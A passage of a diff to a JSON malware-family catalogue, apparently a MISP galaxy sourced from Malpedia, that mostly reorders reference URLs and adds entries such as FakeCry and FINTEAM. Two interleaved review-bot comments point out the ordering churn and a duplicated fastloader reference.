"https://www.bleepingcomputer.com/news/security/ransomware-attacks-continue-in-ukraine-with-mysterious-wannacry-clone/", + "https://www.gdatasoftware.com/blog/2017/07/29859-who-is-behind-petna", + "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", + "https://www.wired.com/story/us-indicts-sandworm-hackers-russia-cyberwar-unit/", + "https://www.youtube.com/watch?v=mrTdSdMMgnk", + "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware", + "https://www.wired.com/story/notpetya-cyberattack-ukraine-russia-code-crashed-the-world/", + "https://therecord.media/mondelez-and-zurich-reach-settlement-in-notpetya-cyberattack-insurance-suit/", + "https://marcoramilli.com/2022/03/01/diskkill-hermeticwiper-and-notpetya-dissimilarities/" ], "synonyms": [ "BadRabbit", @@ -23895,8 +25005,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eternity_clipper", - "https://www.bleepingcomputer.com/news/security/eternity-malware-kit-offers-stealer-miner-worm-ransomware-tools/", "https://www.zscaler.com/blogs/security-research/analysis-lilithbot-malware-and-eternity-threat-group", + "https://www.bleepingcomputer.com/news/security/eternity-malware-kit-offers-stealer-miner-worm-ransomware-tools/", "https://blog.cyble.com/2022/05/12/a-closer-look-at-eternity-malware/" ], "synonyms": [], @@ -23910,8 +25020,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eternity_ransomware", - "https://www.bleepingcomputer.com/news/security/eternity-malware-kit-offers-stealer-miner-worm-ransomware-tools/", "https://yoroi.company/research/a-deep-dive-into-eternity-group-a-new-emerging-cyber-threat/", + "https://www.bleepingcomputer.com/news/security/eternity-malware-kit-offers-stealer-miner-worm-ransomware-tools/", "https://blog.cyble.com/2022/05/12/a-closer-look-at-eternity-malware/" ], "synonyms": [], 
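Review bot: The `@@ -23895,8 +25005,8 @@` hunk for win.eternity_clipper, like the win.eternity_ransomware hunk right after it and most hunks that follow, only permutes an existing `refs` array without adding or removing a URL, so the substantive changes in this patch (new entries, new references) are buried in ordering noise. Emitting `refs` in a deterministic order (sorted, or in the order the upstream source lists them) in the generator would remove this churn from future updates and make repeated URLs inside one array visible at a glance. This is a point about how the file is produced rather than about any single entry, so it applies once to the whole patch.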
@@ -23925,15 +25035,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eternity_stealer", - "https://blog.sekoia.io/eternityteam-a-new-prominent-threat-group-on-underground-forums/", + "https://www.zscaler.com/blogs/security-research/analysis-lilithbot-malware-and-eternity-threat-group", "https://twitter.com/3xp0rtblog/status/1509601846494695438", + "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", + "https://blog.cyble.com/2022/05/12/a-closer-look-at-eternity-malware/", "https://ke-la.com/information-stealers-a-new-landscape/", + "https://securityintelligence.com/news/eternity-gang-ransomware-as-a-service-telegram/", "https://blogs.blackberry.com/en/2022/06/threat-spotlight-eternity-project-maas-goes-on-and-on", "https://yoroi.company/research/a-deep-dive-into-eternity-group-a-new-emerging-cyber-threat/", - "https://www.zscaler.com/blogs/security-research/analysis-lilithbot-malware-and-eternity-threat-group", - "https://blog.cyble.com/2022/05/12/a-closer-look-at-eternity-malware/", - "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", - "https://securityintelligence.com/news/eternity-gang-ransomware-as-a-service-telegram/", + "https://blog.sekoia.io/eternityteam-a-new-prominent-threat-group-on-underground-forums/", "https://blog.morphisec.com/nft-malware-new-evasion-abilities" ], "synonyms": [], @@ -23947,8 +25057,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eternity_worm", - "https://www.bleepingcomputer.com/news/security/eternity-malware-kit-offers-stealer-miner-worm-ransomware-tools/", "https://yoroi.company/research/a-deep-dive-into-eternity-group-a-new-emerging-cyber-threat/", + "https://www.bleepingcomputer.com/news/security/eternity-malware-kit-offers-stealer-miner-worm-ransomware-tools/", "https://blog.cyble.com/2022/05/12/a-closer-look-at-eternity-malware/" ], "synonyms": [], 
@@ -23962,9 +25072,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.etumbot", - "https://www.zscaler.com/blogs/research/cnacom-open-source-exploitation-strategic-web-compromise", "https://www.secureworks.com/research/threat-profiles/bronze-globe", - "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" + "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html", + "https://www.zscaler.com/blogs/research/cnacom-open-source-exploitation-strategic-web-compromise" ], "synonyms": [ "HighTide" @@ -23994,8 +25104,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilextractor", - "https://www.netresec.com/?page=Blog&month=2023-04&post=EvilExtractor-Network-Forensics", - "https://www.fortinet.com/blog/threat-research/evil-extractor-all-in-one-stealer" + "https://www.fortinet.com/blog/threat-research/evil-extractor-all-in-one-stealer", + "https://www.netresec.com/?page=Blog&month=2023-04&post=EvilExtractor-Network-Forensics" ], "synonyms": [], "type": [] @@ -24009,8 +25119,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilgrab", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf", - "https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn", - "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf" + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", + "https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn" ], "synonyms": [ "Vidgrab" 
@@ -24025,13 +25135,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilnum", + "https://www.zscaler.com/blogs/security-research/return-evilnum-apt-updated-ttps-and-new-targets", + "https://docs.broadcom.com/doc/ransom-and-malware-attacks-on-financial-services-institutions", + "https://mp.weixin.qq.com/s/lryl3a65uIz1AwZcfuzp1A", "https://www.proofpoint.com/us/blog/threat-insight/buy-sell-steal-evilnum-targets-cryptocurrency-forex-commodities", "https://github.com/eset/malware-ioc/tree/master/evilnum", - "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", - "https://docs.broadcom.com/doc/ransom-and-malware-attacks-on-financial-services-institutions", - "https://www.zscaler.com/blogs/security-research/return-evilnum-apt-updated-ttps-and-new-targets", "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/", - "https://mp.weixin.qq.com/s/lryl3a65uIz1AwZcfuzp1A" + "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/" ], "synonyms": [], "type": [] @@ -24040,7 +25150,7 @@ "value": "EVILNUM (Windows)" }, { - "description": "A wiper used against in an attack against Iran’s state broadcaster. Using campaign name coined by Check Point in lack of a better name for the wiper component.", + "description": "A wiper used against in an attack against Iran\u2019s state broadcaster. Using campaign name coined by Check Point in lack of a better name for the wiper component.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilplayout", 
@@ -24085,13 +25195,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.exaramel", - "https://www.wired.com/story/sandworm-centreon-russia-hack/", "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf", + "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/", + "https://www.wired.com/story/sandworm-centreon-russia-hack/", "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf", "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/", - "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/", - "https://attack.mitre.org/groups/G0034" + "https://attack.mitre.org/groups/G0034", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf" ], "synonyms": [], "type": [] @@ -24104,7 +25214,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.exbyte", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware" + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", + "https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/" ], "synonyms": [], "type": [] 
@@ -24134,8 +25245,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.exchange_tool", "https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", - "https://github.com/nccgroup/Royal_APT", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://github.com/nccgroup/Royal_APT" ], "synonyms": [], "type": [] @@ -24162,9 +25273,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.exmatter", "https://www.kroll.com/en/insights/publications/cyber/analyzing-exmatter-ransomware-data-exfiltration-tool", - "https://www.netskope.com/blog/blackcat-ransomware-tactics-and-techniques-from-a-targeted-attack", "https://www.accenture.com/us-en/blogs/security/stealbit-exmatter-exfiltration-tool-analysis", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackmatter-data-exfiltration", + "https://www.netskope.com/blog/blackcat-ransomware-tactics-and-techniques-from-a-targeted-attack", "https://twitter.com/knight0x07/status/1461787168037240834?s=20" ], "synonyms": [], 
@@ -24174,7 +25285,7 @@ "value": "ExMatter" }, { - "description": "Ransomware.", + "description": "According to PCrisk, Exorcist is a ransomware-type malicious program. Systems infected with this malware experience data encryption and users receive ransom demands for decryption. During the encryption process, all compromised files are appended with an extension consisting of a ransom string of characters.\r\n\r\nFor example, a file originally named \"1.jpg\" could appear as something similar to \"1.jpg.rnyZoV\" following encryption. After this process is complete, Exorcist ransomware changes the desktop wallpaper and drops HTML applications - \"[random-string]-decrypt.hta\" (e.g. \"rnyZoV-decrypt.hta\") - into affected folders. These files contain identical ransom messages.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.exorcist", @@ -24191,11 +25302,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.expiro", - "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/Expiro", "https://youtu.be/3RYbkORtFnk", + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/Expiro", "https://github.com/GiacomoFerro/malware-analysis/blob/master/report/report-malware.pdf", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/expiro-infects-encrypts-files-to-complicate-repair/", "https://www.welivesecurity.com/2013/07/30/versatile-and-infectious-win64expiro-is-a-cross-platform-file-infector/", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/expiro-infects-encrypts-files-to-complicate-repair/" + "https://medium.com/walmartglobaltech/gazavat-expiro-dmsniff-connection-and-dga-analysis-8b965cc0221d" ], "synonyms": [ "Xpiro" 
@@ -24223,15 +25335,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.extreme_rat", - "https://www2.slideshare.net/ChiEnAshleyShen/hitcon-2020-cti-village-threat-hunting-and-campaign-tracking-workshoppptx/1", - "https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html", - "https://malware.lu/articles/2012/07/22/xtreme-rat-analysis.html", - "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g", - "https://citizenlab.ca/2015/12/packrat-report/", "https://blogs.360.cn/post/APT-C-44.html", - "https://community.rsa.com/community/products/netwitness/blog/2017/08/02/malspam-delivers-xtreme-rat-8-1-2017", + "https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html", "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga", - "https://www.symantec.com/connect/blogs/colombians-major-target-email-campaigns-delivering-xtreme-rat" + "https://www.symantec.com/connect/blogs/colombians-major-target-email-campaigns-delivering-xtreme-rat", + "https://citizenlab.ca/2015/12/packrat-report/", + "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g", + "https://malware.lu/articles/2012/07/22/xtreme-rat-analysis.html", + "https://community.rsa.com/community/products/netwitness/blog/2017/08/02/malspam-delivers-xtreme-rat-8-1-2017", + "https://www2.slideshare.net/ChiEnAshleyShen/hitcon-2020-cti-village-threat-hunting-and-campaign-tracking-workshoppptx/1" ], "synonyms": [ "ExtRat" @@ -24246,8 +25358,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eye_pyramid", - "https://securelist.com/blog/incidents/77098/the-eyepyramid-attacks/", - "http://blog.talosintel.com/2017/01/Eye-Pyramid.html" + "http://blog.talosintel.com/2017/01/Eye-Pyramid.html", + "https://securelist.com/blog/incidents/77098/the-eyepyramid-attacks/" ], "synonyms": [], "type": [] 
@@ -24260,10 +25372,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eyservice", + "https://www.epicturla.com/blog/the-lost-nazar", + "https://blog.malwarelab.pl/posts/nazar_eyservice/", "https://research.checkpoint.com/2020/nazar-spirits-of-the-past/", "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf", - "https://blog.malwarelab.pl/posts/nazar_eyservice/", - "https://www.epicturla.com/blog/the-lost-nazar", "https://blog.malwarelab.pl/posts/nazar_eyservice_comm/" ], "synonyms": [], @@ -24277,8 +25389,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fabookie", - "https://ics-cert.kaspersky.com/publications/reports/2021/12/16/pseudomanuscrypt-a-mass-scale-spyware-attack-campaign/", - "https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1" + "https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1", + "https://ics-cert.kaspersky.com/publications/reports/2021/12/16/pseudomanuscrypt-a-mass-scale-spyware-attack-campaign/" ], "synonyms": [], "type": [] 
@@ -24286,14 +25398,27 @@ "uuid": "782aa125-42ff-4ca0-b9b1-362aac08566b", "value": "Fabookie" }, + { + "description": "Malware written in .NET that mimics WannaCry.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakecry", + "https://securelist.com/in-expetrpetyas-shadow-fakecry-ransomware-wave-hits-ukraine/78973/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c9ac3322-c176-444c-8d72-603430dca2d0", + "value": "FakeCry" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakerean", "https://0x3asecurity.wordpress.com/2015/11/30/134260124544/", - "https://www.exploit-db.com/docs/english/18387-malware-reverse-engineering-part-1---static-analysis.pdf", - "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/FakeRean#technicalDiv" + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/FakeRean#technicalDiv", + "https://www.exploit-db.com/docs/english/18387-malware-reverse-engineering-part-1---static-analysis.pdf" ], "synonyms": [ "Braviax" @@ -24308,8 +25433,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.faketc", - "http://www.welivesecurity.com/2015/07/30/operation-potao-express/", - "https://www.welivesecurity.com/wp-content/uploads/2015/07/Operation-Potao-Express_final_v2.pdf" + "https://www.welivesecurity.com/wp-content/uploads/2015/07/Operation-Potao-Express_final_v2.pdf", + "http://www.welivesecurity.com/2015/07/30/operation-potao-express/" ], "synonyms": [], "type": [] 
@@ -24350,13 +25475,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fanny", - "https://research.checkpoint.com/2021/a-deep-dive-into-doublefeature-equation-groups-post-exploitation-dashboard/", + "https://fmmresearch.wordpress.com/2020/09/28/the-emerald-connection-equationgroup-collaboration-with-stuxnet/", "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/#_1", - "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf", - "https://fmnagisa.wordpress.com/2020/08/27/revisiting-equationgroups-fanny-worm-or-dementiawheel/", "https://fmmresearch.files.wordpress.com/2020/09/theemeraldconnectionreport_fmmr-2.pdf", + "https://fmnagisa.wordpress.com/2020/08/27/revisiting-equationgroups-fanny-worm-or-dementiawheel/", + "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf", "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/", - "https://fmmresearch.wordpress.com/2020/09/28/the-emerald-connection-equationgroup-collaboration-with-stuxnet/" + "https://research.checkpoint.com/2021/a-deep-dive-into-doublefeature-equation-groups-post-exploitation-dashboard/" ], "synonyms": [ "DEMENTIAWHEEL" @@ -24384,8 +25509,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.farseer", - "https://unit42.paloaltonetworks.com/farseer-previously-unknown-malware-family-bolsters-the-chinese-armoury/", "https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/", + "https://unit42.paloaltonetworks.com/farseer-previously-unknown-malware-family-bolsters-the-chinese-armoury/", "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/" ], "synonyms": [], 
@@ -24398,6 +25523,7 @@
 "description": "FastLoader is a small .NET downloader, which name comes from PDB strings seen in samples. It typically downloads TrickBot. It may create a list of processes and uploads it together with screenshot(s). In more recent versions, it employs simple anti-analysis checks (VM detection) and comes with string obfuscations. \r\n",
 "meta": {
 "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fastloader",
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.fastloader"
 ],
 "synonyms": [],
@@ -24412,10 +25538,10 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.fast_pos",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/fastpos-updates-in-time-for-retail-sale-season/",
- "http://documents.trendmicro.com/assets/fastPOS-quick-and-easy-credit-card-theft.pdf",
 "http://documents.trendmicro.com/assets/Appendix%20-%20FastPOS%20Updates%20in%20Time%20for%20the%20Retail%20Sale%20Season.pdf",
- "https://www.justice.gov/opa/pr/malware-author-pleads-guilty-role-transnational-cybercrime-organization-responsible-more-568",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/fastpos-quick-and-easy-credit-card-theft/"
+ "http://documents.trendmicro.com/assets/fastPOS-quick-and-easy-credit-card-theft.pdf",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/fastpos-quick-and-easy-credit-card-theft/",
+ "https://www.justice.gov/opa/pr/malware-author-pleads-guilty-role-transnational-cybercrime-organization-responsible-more-568"
 ],
 "synonyms": [],
 "type": []
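Review bot: The win.fastloader `refs` array in the `@@ -24398,6 +25523,7 @@` hunk now lists `"https://malpedia.caad.fkie.fraunhofer.de/details/win.fastloader"` twice, because the added line repeats the context line directly beneath it; the added line should be dropped so the array stays a set of distinct references. Since every other entry in this patch carries its malpedia URL exactly once, the duplicate most likely comes from the generator not de-duplicating references before emitting them, so a check there is worth more than a hand edit of this one entry. Consumers that iterate `refs` (or count them) will otherwise see the same source reported twice.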
@@ -24428,12 +25554,15 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.fatal_rat",
+ "https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html",
+ "https://www.proofpoint.com/us/blog/threat-insight/chinese-malware-appears-earnest-across-cybercrime-threat-landscape",
 "https://www.youtube.com/watch?v=gjvnVZc11Vg",
 "https://cybersecurity.att.com/blogs/labs-research/new-sophisticated-rat-in-town-fatalrat-analysis",
- "https://thehackernews.com/2022/03/purple-fox-hackers-spotted-using-new.html",
- "https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html"
+ "https://thehackernews.com/2022/03/purple-fox-hackers-spotted-using-new.html"
+ ],
+ "synonyms": [
+ "Sainbox RAT"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "28697d08-27c0-47a9-bfd6-654cac4d55cc",
@@ -24527,10 +25656,10 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.feodo",
 "http://www.sempersecurus.org/2012/08/cridex-analysis-using-volatility.html",
- "http://contagiodump.blogspot.com/2012/08/cridex-analysis-using-volatility-by.html",
- "https://en.wikipedia.org/wiki/Maksim_Yakubets",
 "https://feodotracker.abuse.ch/",
- "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/"
+ "http://contagiodump.blogspot.com/2012/08/cridex-analysis-using-volatility-by.html",
+ "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/",
+ "https://en.wikipedia.org/wiki/Maksim_Yakubets"
 ],
 "synonyms": [
 "Bugat",
@@ -24546,8 +25675,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ffdroider", - "https://thehackernews.com/2022/04/researchers-warn-of-ffdroider-and.html", - "https://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users" + "https://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users", + "https://thehackernews.com/2022/04/researchers-warn-of-ffdroider-and.html" ], "synonyms": [], "type": [] 
@@ -24556,18 +25685,18 @@ "value": "FFDroider" }, { - "description": "According to CyberArk, this malware is used to steal sensitive information, including login credentials, credit card information, cryptocurrency wallets and browser information from applications such as WinSCP, Discord, Google Chrome, Electrum, etc. It does all that by implementing a different approach than other stealers (we’ll cover it later). Additionally, FickerStealer can function as a File Grabber and collect additional files from the compromised machine, and it can act as a Downloader to download and execute several second-stage malware.", + "description": "According to CyberArk, this malware is used to steal sensitive information, including login credentials, credit card information, cryptocurrency wallets and browser information from applications such as WinSCP, Discord, Google Chrome, Electrum, etc. It does all that by implementing a different approach than other stealers (we\u2019ll cover it later). Additionally, FickerStealer can function as a File Grabber and collect additional files from the compromised machine, and it can act as a Downloader to download and execute several second-stage malware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fickerstealer", - "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", - "https://twitter.com/3xp0rtblog/status/1321209656774135810", - "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon", - "https://blogs.blackberry.com/en/2021/08/threat-thursday-ficker-infostealer-malware", "https://www.cyberark.com/resources/threat-research-blog/fickerstealer-a-new-rust-player-in-the-market", - "https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf", - "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf", + "https://twitter.com/3xp0rtblog/status/1321209656774135810", + 
"https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", + "https://blogs.blackberry.com/en/2021/08/threat-thursday-ficker-infostealer-malware", "https://www.bleepingcomputer.com/news/security/fake-microsoft-store-spotify-sites-spread-info-stealing-malware/", + "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon", + "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf", + "https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf", "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus" ], "synonyms": [], @@ -24594,8 +25723,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.filerase", - "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems" + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail" ], "synonyms": [], "type": [] @@ -24621,9 +25750,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.findpos", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", + "https://blogs.cisco.com/security/talos/poseidon", "https://researchcenter.paloaltonetworks.com/2015/03/findpos-new-pos-malware-family-discovered/", - "https://blogs.cisco.com/security/talos/poseidon" + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf" ], "synonyms": [ "Poseidon" 
@@ -24638,28 +25767,28 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.finfisher", + "https://artemonsecurity.blogspot.de/2017/01/finfisher-rootkit-analysis.html", "https://www.msreverseengineering.com/blog/2018/2/21/finspy-vm-unpacking-tutorial-part-3-devirtualization", + "https://www.msreverseengineering.com/blog/2018/2/21/wsbjxrs1jjw7qi4trk9t3qy6hr7dye", + "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/", "https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/", - "https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html", - "https://www.msreverseengineering.com/blog/2018/2/21/devirtualizing-finspy-phase-3-fixing-the-function-related-issues", - "http://www.msreverseengineering.com/blog/2018/1/23/a-walk-through-tutorial-with-code-on-statically-unpacking-the-finspy-vm-part-one-x86-deobfuscation", - "https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf", "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", "https://www.codeandsec.com/FinFisher-Malware-Analysis-Part-2", + "https://www.binarly.io/posts/Design_issues_of_modern_EDR%E2%80%99s_bypassing_ETW-based_solutions/index.html", + "https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf", + "https://www.msreverseengineering.com/blog/2018/2/21/devirtualizing-finspy-phase-4-second-attempt-at-devirtualization", "https://netzpolitik.org/2022/nach-pfaendung-staatstrojaner-hersteller-finfisher-ist-geschlossen-und-bleibt-es-auch/", - "https://www.msreverseengineering.com/blog/2018/2/21/wsbjxrs1jjw7qi4trk9t3qy6hr7dye", - "https://artemonsecurity.blogspot.de/2017/01/finfisher-rootkit-analysis.html", "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process", 
"https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/", - "https://www.binarly.io/posts/Design_issues_of_modern_EDR%E2%80%99s_bypassing_ETW-based_solutions/index.html", - "https://www.msreverseengineering.com/blog/2018/2/21/devirtualizing-finspy-phase-4-second-attempt-at-devirtualization", - "https://github.com/RolfRolles/FinSpyVM", - "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/", - "https://securelist.com/apt-trends-report-q2-2019/91897/", - "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/", "https://www.msreverseengineering.com/blog/2018/2/21/devirtualizing-finspy-phase-2-first-attempt-at-devirtualization", + "https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html", + "https://securelist.com/apt-trends-report-q2-2019/91897/", + "http://www.msreverseengineering.com/blog/2018/1/23/a-walk-through-tutorial-with-code-on-statically-unpacking-the-finspy-vm-part-one-x86-deobfuscation", + "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/", + "https://github.com/RolfRolles/FinSpyVM", "https://www.welivesecurity.com/2017/09/21/new-finfisher-surveillance-campaigns/", - "https://securelist.com/finspy-unseen-findings/104322/" + "https://securelist.com/finspy-unseen-findings/104322/", + "https://www.msreverseengineering.com/blog/2018/2/21/devirtualizing-finspy-phase-3-fixing-the-function-related-issues" ], "synonyms": [ "FinSpy" 
@@ -24669,6 +25798,21 @@
 "uuid": "541b64bc-87ec-4cc2-aaee-329355987853",
 "value": "FinFisher RAT"
 },
+ {
+ "description": "Recently, Check Point researchers spotted a targeted attack against officials within government finance authorities and representatives in several embassies in Europe. The attack, which starts with a malicious attachment disguised as a top secret US document, weaponizes TeamViewer, the popular remote access and desktop sharing software, to gain full control of the infected computer.\r\nThis is achieved by sideloading another DLL among the legit TeamViewer.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.finteam",
+ "https://research.checkpoint.com/finteam-trojanized-teamviewer-against-government-targets/"
+ ],
+ "synonyms": [
+ "TeamBot"
+ ],
+ "type": []
+ },
+ "uuid": "045469d0-5bb2-4ed9-9ee2-a0a08f437433",
+ "value": "FINTEAM"
+ },
 {
 "description": "",
